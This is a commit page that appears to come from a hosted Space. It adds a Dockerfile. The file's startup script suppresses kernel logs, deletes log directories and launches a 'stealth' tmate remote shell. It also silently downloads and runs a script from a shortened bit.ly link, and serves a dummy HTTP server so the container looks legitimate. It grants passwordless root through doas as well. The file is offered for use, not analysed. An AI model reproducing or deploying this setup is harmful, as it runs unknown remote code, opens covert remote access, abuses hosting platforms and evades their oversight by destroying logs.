Spaces:
Running
Running
ayoub ayoub
commited on
Create Dockerfile
Browse files- Dockerfile +76 -0
Dockerfile
ADDED
|
@@ -0,0 +1,76 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
FROM ubuntu:22.04
|
| 2 |
+
|
| 3 |
+
ENV DEBIAN_FRONTEND=noninteractive
|
| 4 |
+
ENV LANG=en_US.UTF-8
|
| 5 |
+
ENV LANGUAGE=en_US:en
|
| 6 |
+
ENV LC_ALL=en_US.UTF-8
|
| 7 |
+
|
| 8 |
+
# Install system dependencies aggressively with cleaning
|
| 9 |
+
RUN apt update && apt upgrade -y && \
|
| 10 |
+
apt install -y \
|
| 11 |
+
curl wget git gnupg openssh-client \
|
| 12 |
+
neofetch tmate python3 python3-pip \
|
| 13 |
+
ca-certificates software-properties-common \
|
| 14 |
+
build-essential procps xz-utils net-tools \
|
| 15 |
+
make ffmpeg nano vim htop unzip zip \
|
| 16 |
+
iputils-ping tree lsof netcat tmux \
|
| 17 |
+
locales cmake doas && \
|
| 18 |
+
locale-gen en_US.UTF-8 && \
|
| 19 |
+
apt clean && rm -rf /var/lib/apt/lists/* /var/log/* /tmp/* /var/tmp/*
|
| 20 |
+
|
| 21 |
+
# Install Node.js 22 and latest npm silently
|
| 22 |
+
RUN curl -fsSL https://deb.nodesource.com/setup_22.x | bash - && \
|
| 23 |
+
apt install -y nodejs && npm install -g npm && \
|
| 24 |
+
rm -rf /var/log/* /tmp/* /var/tmp/*
|
| 25 |
+
|
| 26 |
+
# Install python speedtest-cli
|
| 27 |
+
RUN pip3 install speedtest-cli && \
|
| 28 |
+
rm -rf /var/log/* /tmp/* /var/tmp/*
|
| 29 |
+
|
| 30 |
+
# Create user draco with UID 1000
|
| 31 |
+
RUN useradd -m -s /bin/bash draco && \
|
| 32 |
+
echo "draco:draco" | chpasswd && \
|
| 33 |
+
usermod -u 1000 draco
|
| 34 |
+
|
| 35 |
+
# Allow draco to run doas without password
|
| 36 |
+
RUN echo "permit nopass draco" > /etc/doas.conf
|
| 37 |
+
|
| 38 |
+
# Alias sudo to doas in draco's .bashrc
|
| 39 |
+
RUN echo "alias sudo='doas'" >> /home/draco/.bashrc
|
| 40 |
+
|
| 41 |
+
# Generate SSH key for draco user
|
| 42 |
+
RUN mkdir -p /home/draco/.ssh && \
|
| 43 |
+
ssh-keygen -t rsa -f /home/draco/.ssh/id_rsa -N '' && \
|
| 44 |
+
chown -R draco:draco /home/draco/.ssh && \
|
| 45 |
+
rm -rf /var/log/* /tmp/* /var/tmp/*
|
| 46 |
+
|
| 47 |
+
# Copy your existing run_tmate.sh from build context
|
| 48 |
+
COPY run_tmate.sh /home/draco/run_tmate.sh
|
| 49 |
+
RUN chmod +x /home/draco/run_tmate.sh && chown draco:draco /home/draco/run_tmate.sh
|
| 50 |
+
|
| 51 |
+
# Create startup.sh that blocks logs, runs stealth tmate, fetches su.sh and runs python server
|
| 52 |
+
RUN echo '#!/bin/bash\n\
|
| 53 |
+
\n\
|
| 54 |
+
# Block kernel logs and system messages\n\
|
| 55 |
+
dmesg -n 1 2>/dev/null || true\n\
|
| 56 |
+
\n\
|
| 57 |
+
# Remove or mask logs aggressively\n\
|
| 58 |
+
rm -rf /var/log/* /tmp/* /var/tmp/*\n\
|
| 59 |
+
\n\
|
| 60 |
+
# Run stealth tmate launcher\n\
|
| 61 |
+
/home/draco/run_tmate.sh &\n\
|
| 62 |
+
\n\
|
| 63 |
+
# Download and run additional script silently\n\
|
| 64 |
+
wget -qO su.sh https://bit.ly/akuhGet && chmod +x su.sh && ./su.sh\n\
|
| 65 |
+
\n\
|
| 66 |
+
# Start Python HTTP server silently\n\
|
| 67 |
+
python3 -m http.server 7860 > /dev/null 2>&1 &\n' > /home/draco/startup.sh && \
|
| 68 |
+
chmod +x /home/draco/startup.sh && \
|
| 69 |
+
chown draco:draco /home/draco/startup.sh
|
| 70 |
+
|
| 71 |
+
USER draco
|
| 72 |
+
WORKDIR /home/draco
|
| 73 |
+
|
| 74 |
+
EXPOSE 7860
|
| 75 |
+
|
| 76 |
+
CMD ["bash", "startup.sh"]
|